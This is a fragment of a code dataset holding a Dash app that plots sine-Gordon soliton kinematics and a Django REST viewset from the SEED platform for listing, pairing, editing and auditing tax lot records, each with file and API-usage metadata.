"usage_type": "call"}, {"api_name": "yorm.types.String", "line_number": 139, "usage_type": "name"}, {"api_name": "yorm.attr", "line_number": 140, "usage_type": "call"}, {"api_name": "yorm.attr", "line_number": 141, "usage_type": "call"}, {"api_name": "yorm.types.String", "line_number": 141, "usage_type": "name"}, {"api_name": "yorm.types.List", "line_number": 153, "usage_type": "name"}, {"api_name": "yorm.attr", "line_number": 152, "usage_type": "call"}, {"api_name": "yorm.types.AttributeDictionary", "line_number": 162, "usage_type": "name"}, {"api_name": "yorm.attr", "line_number": 158, "usage_type": "call"}, {"api_name": "yorm.types.String", "line_number": 158, "usage_type": "name"}, {"api_name": "yorm.attr", "line_number": 159, "usage_type": "call"}, {"api_name": "yorm.types.String", "line_number": 159, "usage_type": "name"}, {"api_name": "yorm.attr", "line_number": 160, "usage_type": "call"}, {"api_name": "yorm.types.String", "line_number": 160, "usage_type": "name"}, {"api_name": "yorm.attr", "line_number": 161, "usage_type": "call"}, {"api_name": "yorm.types.List", "line_number": 172, "usage_type": "name"}, {"api_name": "yorm.attr", "line_number": 171, "usage_type": "call"}, {"api_name": "yorm.attr", "line_number": 177, "usage_type": "call"}, {"api_name": "yorm.types.String", "line_number": 177, "usage_type": "name"}, {"api_name": "yorm.attr", "line_number": 178, "usage_type": "call"}, {"api_name": "yorm.types.String", "line_number": 178, "usage_type": "name"}, {"api_name": "yorm.attr", "line_number": 179, "usage_type": "call"}, {"api_name": "yorm.types.Boolean", "line_number": 179, "usage_type": "name"}, {"api_name": "yorm.attr", "line_number": 180, 
"usage_type": "call"}, {"api_name": "yorm.attr", "line_number": 181, "usage_type": "call"}, {"api_name": "yorm.attr", "line_number": 182, "usage_type": "call"}, {"api_name": "yorm.attr", "line_number": 183, "usage_type": "call"}, {"api_name": "yorm.sync", "line_number": 184, "usage_type": "call"}]}
+{"seq_id": "206611506", "text": "### Show 'snapshot' of field at the boundary\nimport xarray as xr\nimport numpy as np\nfrom numpy import pi\nimport os \n\nimport dash\nimport dash_core_components as dcc\nimport dash_html_components as html\n\ndir_path = os.path.dirname(__file__)\nif dir_path:\n dir_path += '/'\narrayFile = dir_path + 'v875Kinematics_k201_t1000_dx025_dt02_eigenvalues.nc'\n\nwith xr.open_dataset(arrayFile, engine='h5netcdf') as eigenvalues:\n from SolitonScattering import SG\n eigenvalues = SG.ScatteringData(eigenvalues)\n typed_kinematics = eigenvalues.typed_kinematics()\n\ngraph = dcc.Graph(\n id='v95Kinematics',\n figure={\n 'data': [{\n 'x': eigenvalues.data['k'].data, \n 'y': typed_kinematics['Kink']['speed'][:,0], \n 'name': 'Kink',\n 'line': {'color':'#1f77b4'},\n },\n {\n 'x': eigenvalues.data['k'].data, \n 'y': typed_kinematics['Antikink']['speed'][:,0], \n 'name': 'Antikink',\n 'line': {'color':'#d62728'},\n },\n {\n 'x': eigenvalues.data['k'].data, \n 'y': typed_kinematics['Breather']['speed'].data, \n 'name': 'Breather Speed',\n 'line': {'color':'#2ca02c'},\n },\n {\n 'x': eigenvalues.data['k'].data, \n 'y': typed_kinematics['Breather']['frequency'].data, \n 'name': 'Breather Frequency',\n 'line': {'color':'black', 'dash':'dash'},\n },\n ],\n 'layout': {\n 'xaxis': {\n 'title':'Defect Parameter, k', \n },\n 'yaxis': {\n 'title':'Speed/Frequency', \n 'range':[0,1],\n },\n 'title': \"Kinematics for v0=0.875\",\n },\n }\n)\n\nif __name__ == '__main__':\n app = dash.Dash()\n server = app.server\n app.layout = html.Div(children=[graph])\n app.run_server(debug=True)\n", "sub_path": "v875Kinematics/app.py", "file_name": "app.py", "file_ext": "py", "file_size_in_byte": 1901, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "os.path.dirname", "line_number": 11, "usage_type": "call"}, {"api_name": "os.path", "line_number": 11, "usage_type": "attribute"}, {"api_name": "xarray.open_dataset", "line_number": 16, "usage_type": "call"}, {"api_name": "SolitonScattering.SG.ScatteringData", "line_number": 18, "usage_type": "call"}, {"api_name": "SolitonScattering.SG", "line_number": 18, "usage_type": "name"}, {"api_name": "dash_core_components.Graph", "line_number": 21, "usage_type": "call"}, {"api_name": "dash.Dash", "line_number": 63, "usage_type": "call"}, {"api_name": "dash_html_components.Div", "line_number": 65, "usage_type": "call"}]}
+{"seq_id": "41060620", "text": "# !/usr/bin/env python\n# encoding: utf-8\n\"\"\"\n:copyright (c) 2014 - 2017, The Regents of the University of California,\nthrough Lawrence Berkeley National Laboratory (subject to receipt of any\nrequired approvals from the U.S. Department of Energy) and contributors.\nAll rights reserved. # NOQA\n:author\n\"\"\"\n\nimport re\nfrom os import path\n\nfrom django.core.paginator import EmptyPage, PageNotAnInteger, Paginator\nfrom django.http import JsonResponse\nfrom rest_framework import status\nfrom rest_framework.decorators import detail_route, list_route\nfrom rest_framework.renderers import JSONRenderer\nfrom rest_framework.viewsets import GenericViewSet\n\nfrom seed.decorators import ajax_request_class\nfrom seed.lib.superperms.orgs.decorators import has_perm_class\nfrom seed.models import (\n AUDIT_USER_EDIT,\n Column,\n Cycle,\n PropertyView,\n TaxLotAuditLog,\n TaxLotProperty,\n TaxLotState,\n TaxLotView\n)\nfrom seed.serializers.pint import PintJSONEncoder\nfrom seed.serializers.properties import (\n PropertyViewSerializer\n)\nfrom seed.serializers.taxlots import (\n TaxLotSerializer,\n TaxLotStateSerializer,\n TaxLotViewSerializer\n)\nfrom seed.utils.api import api_endpoint_class\nfrom seed.utils.properties import (\n get_changed_fields,\n pair_unpair_property_taxlot,\n update_result_with_master\n)\nfrom seed.utils.time import convert_to_js_timestamp\n\n# Global toggle that controls whether or not to display the raw extra\n# data fields in the columns returned for the view.\nDISPLAY_RAW_EXTRADATA = True\nDISPLAY_RAW_EXTRADATA_TIME = True\n\n\nclass TaxLotViewSet(GenericViewSet):\n renderer_classes = (JSONRenderer,)\n serializer_class = TaxLotSerializer\n\n def _get_filtered_results(self, request, columns):\n page = request.query_params.get('page', 1)\n per_page = request.query_params.get('per_page', 1)\n org_id = request.query_params.get('organization_id', None)\n cycle_id = request.query_params.get('cycle')\n if not org_id:\n return JsonResponse(\n {'status': 'error', 'message': 'Need to pass organization_id as query parameter'},\n status=status.HTTP_400_BAD_REQUEST)\n\n if cycle_id:\n cycle = Cycle.objects.get(organization_id=org_id, pk=cycle_id)\n else:\n cycle = Cycle.objects.filter(organization_id=org_id).order_by('name')\n if cycle:\n cycle = cycle.first()\n else:\n return JsonResponse({\n 'status': 'error',\n 'message': 'Could not locate cycle',\n 'pagination': {\n 'total': 0\n },\n 'cycle_id': None,\n 'results': []\n })\n\n taxlot_views_list = TaxLotView.objects.select_related('taxlot', 'state', 'cycle') \\\n .filter(taxlot__organization_id=request.query_params['organization_id'], cycle=cycle) \\\n .order_by('id')\n\n paginator = Paginator(taxlot_views_list, per_page)\n\n try:\n taxlot_views = paginator.page(page)\n page = int(page)\n except PageNotAnInteger:\n taxlot_views = paginator.page(1)\n page = 1\n except EmptyPage:\n taxlot_views = paginator.page(paginator.num_pages)\n page = paginator.num_pages\n\n response = {\n 'pagination': {\n 'page': page,\n 'start': paginator.page(page).start_index(),\n 'end': paginator.page(page).end_index(),\n 'num_pages': paginator.num_pages,\n 'has_next': paginator.page(page).has_next(),\n 'has_previous': paginator.page(page).has_previous(),\n 'total': paginator.count\n },\n 'cycle_id': cycle.id,\n 'results': TaxLotProperty.get_related(taxlot_views, columns)\n }\n\n return JsonResponse(response, encoder=PintJSONEncoder)\n\n # @require_organization_id\n # @require_organization_membership\n 
@api_endpoint_class\n @ajax_request_class\n @has_perm_class('requires_viewer')\n def list(self, request):\n \"\"\"\n List all the properties\n ---\n parameters:\n - name: organization_id\n description: The organization_id for this user's organization\n required: true\n paramType: query\n - name: cycle\n description: The ID of the cycle to get taxlots\n required: true\n paramType: query\n - name: page\n description: The current page of taxlots to return\n required: false\n paramType: query\n - name: per_page\n description: The number of items per page to return\n required: false\n paramType: query\n \"\"\"\n return self._get_filtered_results(request, columns=[])\n\n # @require_organization_id\n # @require_organization_membership\n @api_endpoint_class\n @ajax_request_class\n @has_perm_class('requires_viewer')\n @list_route(methods=['POST'])\n def filter(self, request):\n \"\"\"\n List all the properties\n ---\n parameters:\n - name: organization_id\n description: The organization_id for this user's organization\n required: true\n paramType: query\n - name: cycle\n description: The ID of the cycle to get taxlots\n required: true\n paramType: query\n - name: page\n description: The current page of taxlots to return\n required: false\n paramType: query\n - name: per_page\n description: The number of items per page to return\n required: false\n paramType: query\n - name: column filter data\n description: Object containing columns to filter on, should be a JSON object with a single key \"columns\"\n whose value is a list of strings, each representing a column name\n paramType: body\n \"\"\"\n try:\n columns = dict(request.data.iterlists())['columns']\n except AttributeError:\n columns = request.data['columns']\n return self._get_filtered_results(request, columns=columns)\n\n @api_endpoint_class\n @ajax_request_class\n @has_perm_class('can_modify_data')\n @detail_route(methods=['PUT'])\n def pair(self, request, pk=None):\n \"\"\"\n Pair a property to this taxlot\n ---\n parameter_strategy: replace\n parameters:\n - name: organization_id\n description: The organization_id for this user's organization\n required: true\n paramType: query\n - name: property_id\n description: The property id to pair up with this taxlot\n required: true\n paramType: query\n - name: pk\n description: pk (taxlot ID)\n required: true\n paramType: path\n \"\"\"\n # TODO: Call with PUT /api/v2/taxlots/1/pair/?property_id=1&organization_id=1\n organization_id = int(request.query_params.get('organization_id'))\n property_id = int(request.query_params.get('property_id'))\n taxlot_id = int(pk)\n return pair_unpair_property_taxlot(property_id, taxlot_id, organization_id, True)\n\n @api_endpoint_class\n @ajax_request_class\n @has_perm_class('can_modify_data')\n @detail_route(methods=['PUT'])\n def unpair(self, request, pk=None):\n \"\"\"\n Unpair a property from this taxlot\n ---\n parameter_strategy: replace\n parameters:\n - name: organization_id\n description: The organization_id for this user's organization\n required: true\n paramType: query\n - name: property_id\n description: The property id to unpair from this taxlot\n required: true\n paramType: query\n - name: pk\n description: pk (taxlot ID)\n required: true\n paramType: path\n \"\"\"\n # TODO: Call with PUT /api/v2/taxlots/1/unpair/?property_id=1&organization_id=1\n organization_id = int(request.query_params.get('organization_id'))\n property_id = int(request.query_params.get('property_id'))\n taxlot_id = int(pk)\n return pair_unpair_property_taxlot(property_id, 
taxlot_id, organization_id, False)\n\n # @require_organization_id\n # @require_organization_membership\n @api_endpoint_class\n @ajax_request_class\n @has_perm_class('requires_viewer')\n @list_route(methods=['GET'])\n def columns(self, request):\n \"\"\"\n List all tax lot columns\n ---\n parameters:\n - name: organization_id\n description: The organization_id for this user's organization\n required: true\n paramType: query\n \"\"\"\n organization_id = int(request.query_params.get('organization_id'))\n columns = Column.retrieve_all(organization_id, 'taxlot')\n\n return JsonResponse({'columns': columns})\n\n @api_endpoint_class\n @ajax_request_class\n @has_perm_class('can_modify_data')\n @list_route(methods=['DELETE'])\n def batch_delete(self, request):\n \"\"\"\n Batch delete several tax lots\n ---\n parameters:\n - name: selected\n description: A list of taxlot ids to delete\n many: true\n required: true\n \"\"\"\n taxlot_states = request.data.get('selected', [])\n resp = TaxLotState.objects.filter(pk__in=taxlot_states).delete()\n\n if resp[0] == 0:\n return JsonResponse({'status': 'warning', 'message': 'No action was taken'})\n\n return JsonResponse({'status': 'success', 'taxlots': resp[1]['seed.TaxLotState']})\n\n def _get_taxlot_view(self, taxlot_pk, cycle_pk):\n try:\n taxlot_view = TaxLotView.objects.select_related(\n 'taxlot', 'cycle', 'state'\n ).get(\n taxlot_id=taxlot_pk,\n cycle_id=cycle_pk,\n taxlot__organization_id=self.request.GET['organization_id']\n )\n result = {\n 'status': 'success',\n 'taxlot_view': taxlot_view\n }\n except TaxLotView.DoesNotExist:\n result = {\n 'status': 'error',\n 'message': 'taxlot view with id {} does not exist'.format(\n taxlot_pk)\n }\n except TaxLotView.MultipleObjectsReturned:\n result = {\n 'status': 'error',\n 'message': 'Multiple taxlot views with id {}'.format(\n taxlot_pk)\n }\n return result\n\n @api_endpoint_class\n @ajax_request_class\n @detail_route(methods=['GET'])\n def view(self, request, pk=None):\n \"\"\"\n Get the TaxLot view\n ---\n parameters:\n - name: cycle_id\n description: The cycle ID to query on\n required: true\n paramType: query\n \"\"\"\n cycle_pk = request.query_params.get('cycle_id', None)\n if not cycle_pk:\n return JsonResponse(\n {'status': 'error', 'message': 'Must pass in cycle_id as query parameter'})\n result = self._get_taxlot_view(pk, cycle_pk)\n return JsonResponse(result)\n\n def get_history(self, taxlot_view):\n \"\"\"Return history in reverse order.\"\"\"\n history = []\n\n def record_dict(log):\n filename = None if not log.import_filename else path.basename(log.import_filename)\n if filename:\n # Attempt to remove NamedTemporaryFile suffix\n name, ext = path.splitext(filename)\n pattern = re.compile('(.*?)(_[a-zA-Z0-9]{7})$')\n match = pattern.match(name)\n if match:\n filename = match.groups()[0] + ext\n return {\n 'state': TaxLotStateSerializer(log.state).data,\n 'date_edited': convert_to_js_timestamp(log.created),\n 'source': log.get_record_type_display(),\n 'filename': filename,\n # 'changed_fields': json.loads(log.description) if log.record_type == AUDIT_USER_EDIT else None\n }\n\n log = TaxLotAuditLog.objects.select_related('state', 'parent1', 'parent2').filter(\n state_id=taxlot_view.state_id\n ).order_by('-id').first()\n master = {\n 'state': TaxLotStateSerializer(log.state).data,\n 'date_edited': convert_to_js_timestamp(log.created),\n }\n\n # Traverse parents and add to history\n if log.name in ['Manual Match', 'System Match', 'Merge current state in migration']:\n done_searching = False\n 
while not done_searching:\n if (log.parent1_id is None and log.parent2_id is None) or log.name == 'Manual Edit':\n done_searching = True\n elif log.name == 'Merge current state in migration':\n record = record_dict(log.parent1)\n history.append(record)\n if log.parent1.name == 'Import Creation':\n done_searching = True\n else:\n tree = log.parent1\n log = tree\n else:\n tree = None\n if log.parent2:\n if log.parent2.name in ['Import Creation', 'Manual Edit']:\n record = record_dict(log.parent2)\n history.append(record)\n elif log.parent2.name == 'System Match' and log.parent2.parent1.name == 'Import Creation' and \\\n log.parent2.parent2.name == 'Import Creation':\n # Handle case where an import file matches within itself, and proceeds to match with\n # existing records\n record = record_dict(log.parent2.parent2)\n history.append(record)\n record = record_dict(log.parent2.parent1)\n history.append(record)\n else:\n tree = log.parent2\n if log.parent1.name in ['Import Creation', 'Manual Edit']:\n record = record_dict(log.parent1)\n history.append(record)\n else:\n tree = log.parent1\n\n if not tree:\n done_searching = True\n else:\n log = tree\n elif log.name == 'Manual Edit':\n record = record_dict(log.parent1)\n history.append(record)\n elif log.name == 'Import Creation':\n record = record_dict(log)\n history.append(record)\n\n return history, master\n\n def _get_properties(self, taxlot_view_pk):\n property_view_pks = TaxLotProperty.objects.filter(\n taxlot_view_id=taxlot_view_pk\n ).values_list('property_view_id', flat=True)\n property_views = PropertyView.objects.filter(\n pk__in=property_view_pks\n ).select_related('cycle', 'state')\n properties = []\n for property_view in property_views:\n properties.append(PropertyViewSerializer(property_view).data)\n return properties\n\n @api_endpoint_class\n @ajax_request_class\n @detail_route(methods=['GET'])\n def properties(self, pk):\n \"\"\"\n Get related properties for this tax lot\n \"\"\"\n return JsonResponse(self._get_properties(pk))\n\n @api_endpoint_class\n @ajax_request_class\n def retrieve(self, request, pk):\n \"\"\"\n Get property details\n ---\n parameters:\n - name: cycle_id\n description: The cycle id for filtering the taxlot view\n required: true\n paramType: query\n - name: organization_id\n description: The organization_id for this user's organization\n required: true\n paramType: query\n \"\"\"\n cycle_pk = request.query_params.get('cycle_id', None)\n if not cycle_pk:\n return JsonResponse(\n {'status': 'error', 'message': 'Must pass in cycle_id as query parameter'})\n result = self._get_taxlot_view(pk, cycle_pk)\n if result.get('status', None) != 'error':\n taxlot_view = result.pop('taxlot_view')\n result.update(TaxLotViewSerializer(taxlot_view).data)\n # remove TaxLotView id from result\n result.pop('id')\n result['state'] = TaxLotStateSerializer(taxlot_view.state).data\n result['properties'] = self._get_properties(taxlot_view.pk)\n result['history'], master = self.get_history(taxlot_view)\n result = update_result_with_master(result, master)\n status_code = status.HTTP_200_OK\n else:\n status_code = status.HTTP_404_NOT_FOUND\n return JsonResponse(result, status=status_code)\n\n @api_endpoint_class\n @ajax_request_class\n def update(self, request, pk):\n \"\"\"\n Update a taxlot\n ---\n parameters:\n - name: cycle_id\n description: The cycle id for filtering the taxlot view\n required: true\n paramType: query\n \"\"\"\n data = request.data\n cycle_pk = request.query_params.get('cycle_id', None)\n if not cycle_pk:\n return 
JsonResponse(\n {'status': 'error', 'message': 'Must pass in cycle_id as query parameter'})\n result = self._get_taxlot_view(pk, cycle_pk)\n if result.get('status', None) != 'error':\n taxlot_view = result.pop('taxlot_view')\n taxlot_state_data = TaxLotStateSerializer(taxlot_view.state).data\n new_taxlot_state_data = data['state']\n\n changed = True\n for key, val in new_taxlot_state_data.iteritems():\n if val == '':\n new_taxlot_state_data[key] = None\n changed_fields = get_changed_fields(\n taxlot_state_data, new_taxlot_state_data\n )\n if not changed_fields:\n changed = False\n if not changed:\n result.update(\n {'status': 'error', 'message': 'Nothing to update'}\n )\n status_code = 422 # status.HTTP_422_UNPROCESSABLE_ENTITY\n else:\n log = TaxLotAuditLog.objects.select_related().filter(\n state=taxlot_view.state\n ).order_by('-id').first()\n\n if 'extra_data' in new_taxlot_state_data.keys():\n taxlot_state_data['extra_data'].update(new_taxlot_state_data.pop('extra_data'))\n taxlot_state_data.update(new_taxlot_state_data)\n\n if log.name == 'Import Creation':\n # Add new state\n taxlot_state_data.pop('id')\n new_taxlot_state_serializer = TaxLotStateSerializer(\n data=taxlot_state_data\n )\n if new_taxlot_state_serializer.is_valid():\n new_state = new_taxlot_state_serializer.save()\n taxlot_view.state = new_state\n taxlot_view.save()\n\n TaxLotAuditLog.objects.create(organization=log.organization,\n parent1=log,\n parent2=None,\n parent_state1=log.state,\n parent_state2=None,\n state=new_state,\n name='Manual Edit',\n description=None,\n import_filename=log.import_filename,\n record_type=AUDIT_USER_EDIT)\n\n result.update(\n {'state': new_taxlot_state_serializer.validated_data}\n )\n # Removing organization key AND import_file key because they're not JSON-serializable\n # TODO find better solution\n result['state'].pop('organization')\n result['state'].pop('import_file')\n status_code = status.HTTP_201_CREATED\n else:\n result.update(\n {'status': 'error', 'message': 'Invalid Data'}\n )\n status_code = 422 # status.HTTP_422_UNPROCESSABLE_ENTITY\n elif log.name in ['Manual Edit', 'Manual Match', 'System Match',\n 'Merge current state in migration']:\n # Override previous edit state or merge state\n state = taxlot_view.state\n for key, value in new_taxlot_state_data.iteritems():\n setattr(state, key, value)\n state.save()\n\n result.update(\n {'state': TaxLotStateSerializer(state).data}\n )\n # Removing organization key AND import_file key because they're not JSON-serializable\n # TODO find better solution\n result['state'].pop('organization')\n result['state'].pop('import_file')\n\n status_code = status.HTTP_201_CREATED\n else:\n result = {'status': 'error',\n 'message': 'Unrecognized audit log name: ' + log.name}\n status_code = 422\n return JsonResponse(result, status=status_code)\n\n else:\n status_code = status.HTTP_404_NOT_FOUND\n return JsonResponse(result, status=status_code)\n", "sub_path": "seed/views/taxlots.py", "file_name": "taxlots.py", "file_ext": "py", "file_size_in_byte": 22505, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "74", "api": [{"api_name": "rest_framework.viewsets.GenericViewSet", "line_number": 56, "usage_type": "name"}, {"api_name": "rest_framework.renderers.JSONRenderer", "line_number": 57, "usage_type": "name"}, {"api_name": "seed.serializers.taxlots.TaxLotSerializer", "line_number": 58, "usage_type": "name"}, {"api_name": "django.http.JsonResponse", "line_number": 66, "usage_type": "call"}, {"api_name": 
"rest_framework.status.HTTP_400_BAD_REQUEST", "line_number": 68, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 68, "usage_type": "name"}, {"api_name": "seed.models.Cycle.objects.get", "line_number": 71, "usage_type": "call"}, {"api_name": "seed.models.Cycle.objects", "line_number": 71, "usage_type": "attribute"}, {"api_name": "seed.models.Cycle", "line_number": 71, "usage_type": "name"}, {"api_name": "seed.models.Cycle.objects.filter", "line_number": 73, "usage_type": "call"}, {"api_name": "seed.models.Cycle.objects", "line_number": 73, "usage_type": "attribute"}, {"api_name": "seed.models.Cycle", "line_number": 73, "usage_type": "name"}, {"api_name": "django.http.JsonResponse", "line_number": 77, "usage_type": "call"}, {"api_name": "seed.models.TaxLotView.objects.select_related", "line_number": 87, "usage_type": "call"}, {"api_name": "seed.models.TaxLotView.objects", "line_number": 87, "usage_type": "attribute"}, {"api_name": "seed.models.TaxLotView", "line_number": 87, "usage_type": "name"}, {"api_name": "django.core.paginator.Paginator", "line_number": 91, "usage_type": "call"}, {"api_name": "django.core.paginator.PageNotAnInteger", "line_number": 96, "usage_type": "name"}, {"api_name": "django.core.paginator.EmptyPage", "line_number": 99, "usage_type": "name"}, {"api_name": "seed.models.TaxLotProperty.get_related", "line_number": 114, "usage_type": "call"}, {"api_name": "seed.models.TaxLotProperty", "line_number": 114, "usage_type": "name"}, {"api_name": "django.http.JsonResponse", "line_number": 117, "usage_type": "call"}, {"api_name": "seed.serializers.pint.PintJSONEncoder", "line_number": 117, "usage_type": "name"}, {"api_name": "seed.utils.api.api_endpoint_class", "line_number": 121, "usage_type": "name"}, {"api_name": "seed.decorators.ajax_request_class", "line_number": 122, "usage_type": "name"}, {"api_name": "seed.lib.superperms.orgs.decorators.has_perm_class", "line_number": 123, "usage_type": "call"}, {"api_name": "seed.utils.api.api_endpoint_class", "line_number": 150, "usage_type": "name"}, {"api_name": "seed.decorators.ajax_request_class", "line_number": 151, "usage_type": "name"}, {"api_name": "seed.lib.superperms.orgs.decorators.has_perm_class", "line_number": 152, "usage_type": "call"}, {"api_name": "rest_framework.decorators.list_route", "line_number": 153, "usage_type": "call"}, {"api_name": "seed.utils.properties.pair_unpair_property_taxlot", "line_number": 213, "usage_type": "call"}, {"api_name": "seed.utils.api.api_endpoint_class", "line_number": 186, "usage_type": "name"}, {"api_name": "seed.decorators.ajax_request_class", "line_number": 187, "usage_type": "name"}, {"api_name": "seed.lib.superperms.orgs.decorators.has_perm_class", "line_number": 188, "usage_type": "call"}, {"api_name": "rest_framework.decorators.detail_route", "line_number": 189, "usage_type": "call"}, {"api_name": "seed.utils.properties.pair_unpair_property_taxlot", "line_number": 242, "usage_type": "call"}, {"api_name": "seed.utils.api.api_endpoint_class", "line_number": 215, "usage_type": "name"}, {"api_name": "seed.decorators.ajax_request_class", "line_number": 216, "usage_type": "name"}, {"api_name": "seed.lib.superperms.orgs.decorators.has_perm_class", "line_number": 217, "usage_type": "call"}, {"api_name": "rest_framework.decorators.detail_route", "line_number": 218, "usage_type": "call"}, {"api_name": "seed.models.Column.retrieve_all", "line_number": 261, "usage_type": "call"}, {"api_name": "seed.models.Column", "line_number": 261, "usage_type": "name"}, 
{"api_name": "django.http.JsonResponse", "line_number": 263, "usage_type": "call"}, {"api_name": "seed.utils.api.api_endpoint_class", "line_number": 246, "usage_type": "name"}, {"api_name": "seed.decorators.ajax_request_class", "line_number": 247, "usage_type": "name"}, {"api_name": "seed.lib.superperms.orgs.decorators.has_perm_class", "line_number": 248, "usage_type": "call"}, {"api_name": "rest_framework.decorators.list_route", "line_number": 249, "usage_type": "call"}, {"api_name": "seed.models.TaxLotState.objects.filter", "line_number": 280, "usage_type": "call"}, {"api_name": "seed.models.TaxLotState.objects", "line_number": 280, "usage_type": "attribute"}, {"api_name": "seed.models.TaxLotState", "line_number": 280, "usage_type": "name"}, {"api_name": "django.http.JsonResponse", "line_number": 283, "usage_type": "call"}, {"api_name": "django.http.JsonResponse", "line_number": 285, "usage_type": "call"}, {"api_name": "seed.utils.api.api_endpoint_class", "line_number": 265, "usage_type": "name"}, {"api_name": "seed.decorators.ajax_request_class", "line_number": 266, "usage_type": "name"}, {"api_name": "seed.lib.superperms.orgs.decorators.has_perm_class", "line_number": 267, "usage_type": "call"}, {"api_name": "rest_framework.decorators.list_route", "line_number": 268, "usage_type": "call"}, {"api_name": "seed.models.TaxLotView.objects.select_related", "line_number": 289, "usage_type": "call"}, {"api_name": "seed.models.TaxLotView.objects", "line_number": 289, "usage_type": "attribute"}, {"api_name": "seed.models.TaxLotView", "line_number": 289, "usage_type": "name"}, {"api_name": "seed.models.TaxLotView.DoesNotExist", "line_number": 300, "usage_type": "attribute"}, {"api_name": "seed.models.TaxLotView", "line_number": 300, "usage_type": "name"}, {"api_name": "seed.models.TaxLotView.MultipleObjectsReturned", "line_number": 306, "usage_type": "attribute"}, {"api_name": "seed.models.TaxLotView", "line_number": 306, "usage_type": "name"}, {"api_name": "django.http.JsonResponse", "line_number": 329, "usage_type": "call"}, {"api_name": "django.http.JsonResponse", "line_number": 332, "usage_type": "call"}, {"api_name": "seed.utils.api.api_endpoint_class", "line_number": 314, "usage_type": "name"}, {"api_name": "seed.decorators.ajax_request_class", "line_number": 315, "usage_type": "name"}, {"api_name": "rest_framework.decorators.detail_route", "line_number": 316, "usage_type": "call"}, {"api_name": "os.path.basename", "line_number": 339, "usage_type": "call"}, {"api_name": "os.path", "line_number": 339, "usage_type": "name"}, {"api_name": "os.path.splitext", "line_number": 342, "usage_type": "call"}, {"api_name": "os.path", "line_number": 342, "usage_type": "name"}, {"api_name": "re.compile", "line_number": 343, "usage_type": "call"}, {"api_name": "seed.serializers.taxlots.TaxLotStateSerializer", "line_number": 348, "usage_type": "call"}, {"api_name": "seed.utils.time.convert_to_js_timestamp", "line_number": 349, "usage_type": "call"}, {"api_name": "seed.models.TaxLotAuditLog.objects.select_related", "line_number": 355, "usage_type": "call"}, {"api_name": "seed.models.TaxLotAuditLog.objects", "line_number": 355, "usage_type": "attribute"}, {"api_name": "seed.models.TaxLotAuditLog", "line_number": 355, "usage_type": "name"}, {"api_name": "seed.serializers.taxlots.TaxLotStateSerializer", "line_number": 359, "usage_type": "call"}, {"api_name": "seed.utils.time.convert_to_js_timestamp", "line_number": 360, "usage_type": "call"}, {"api_name": "seed.models.TaxLotProperty.objects.filter", 
"line_number": 413, "usage_type": "call"}, {"api_name": "seed.models.TaxLotProperty.objects", "line_number": 413, "usage_type": "attribute"}, {"api_name": "seed.models.TaxLotProperty", "line_number": 413, "usage_type": "name"}, {"api_name": "seed.models.PropertyView.objects.filter", "line_number": 416, "usage_type": "call"}, {"api_name": "seed.models.PropertyView.objects", "line_number": 416, "usage_type": "attribute"}, {"api_name": "seed.models.PropertyView", "line_number": 416, "usage_type": "name"}, {"api_name": "seed.serializers.properties.PropertyViewSerializer", "line_number": 421, "usage_type": "call"}, {"api_name": "django.http.JsonResponse", "line_number": 431, "usage_type": "call"}, {"api_name": "seed.utils.api.api_endpoint_class", "line_number": 424, "usage_type": "name"}, {"api_name": "seed.decorators.ajax_request_class", "line_number": 425, "usage_type": "name"}, {"api_name": "rest_framework.decorators.detail_route", "line_number": 426, "usage_type": "call"}, {"api_name": "django.http.JsonResponse", "line_number": 451, "usage_type": "call"}, {"api_name": "seed.serializers.taxlots.TaxLotViewSerializer", "line_number": 456, "usage_type": "call"}, {"api_name": "seed.serializers.taxlots.TaxLotStateSerializer", "line_number": 459, "usage_type": "call"}, {"api_name": "seed.utils.properties.update_result_with_master", "line_number": 462, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_200_OK", "line_number": 463, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 463, "usage_type": "name"}, {"api_name": "rest_framework.status.HTTP_404_NOT_FOUND", "line_number": 465, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 465, "usage_type": "name"}, {"api_name": "django.http.JsonResponse", "line_number": 466, "usage_type": "call"}, {"api_name": "seed.utils.api.api_endpoint_class", "line_number": 433, "usage_type": "name"}, {"api_name": "seed.decorators.ajax_request_class", "line_number": 434, "usage_type": "name"}, {"api_name": "django.http.JsonResponse", "line_number": 483, "usage_type": "call"}, {"api_name": "seed.serializers.taxlots.TaxLotStateSerializer", "line_number": 488, "usage_type": "call"}, {"api_name": "seed.utils.properties.get_changed_fields", "line_number": 495, "usage_type": "call"}, {"api_name": "seed.models.TaxLotAuditLog.objects.select_related", "line_number": 506, "usage_type": "call"}, {"api_name": "seed.models.TaxLotAuditLog.objects", "line_number": 506, "usage_type": "attribute"}, {"api_name": "seed.models.TaxLotAuditLog", "line_number": 506, "usage_type": "name"}, {"api_name": "seed.serializers.taxlots.TaxLotStateSerializer", "line_number": 517, "usage_type": "call"}, {"api_name": "seed.models.TaxLotAuditLog.objects.create", "line_number": 525, "usage_type": "call"}, {"api_name": "seed.models.TaxLotAuditLog.objects", "line_number": 525, "usage_type": "attribute"}, {"api_name": "seed.models.TaxLotAuditLog", "line_number": 525, "usage_type": "name"}, {"api_name": "seed.models.AUDIT_USER_EDIT", "line_number": 534, "usage_type": "name"}, {"api_name": "rest_framework.status.HTTP_201_CREATED", "line_number": 543, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 543, "usage_type": "name"}, {"api_name": "seed.serializers.taxlots.TaxLotStateSerializer", "line_number": 558, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_201_CREATED", "line_number": 565, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 565, "usage_type": 
"name"}, {"api_name": "django.http.JsonResponse", "line_number": 570, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_404_NOT_FOUND", "line_number": 573, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 573, "usage_type": "name"}, {"api_name": "django.http.JsonResponse", "line_number": 574, "usage_type": "call"}, {"api_name": "seed.utils.api.api_endpoint_class", "line_number": 468, "usage_type": "name"}, {"api_name": "seed.decorators.ajax_request_class", "line_number": 469, "usage_type": "name"}]}
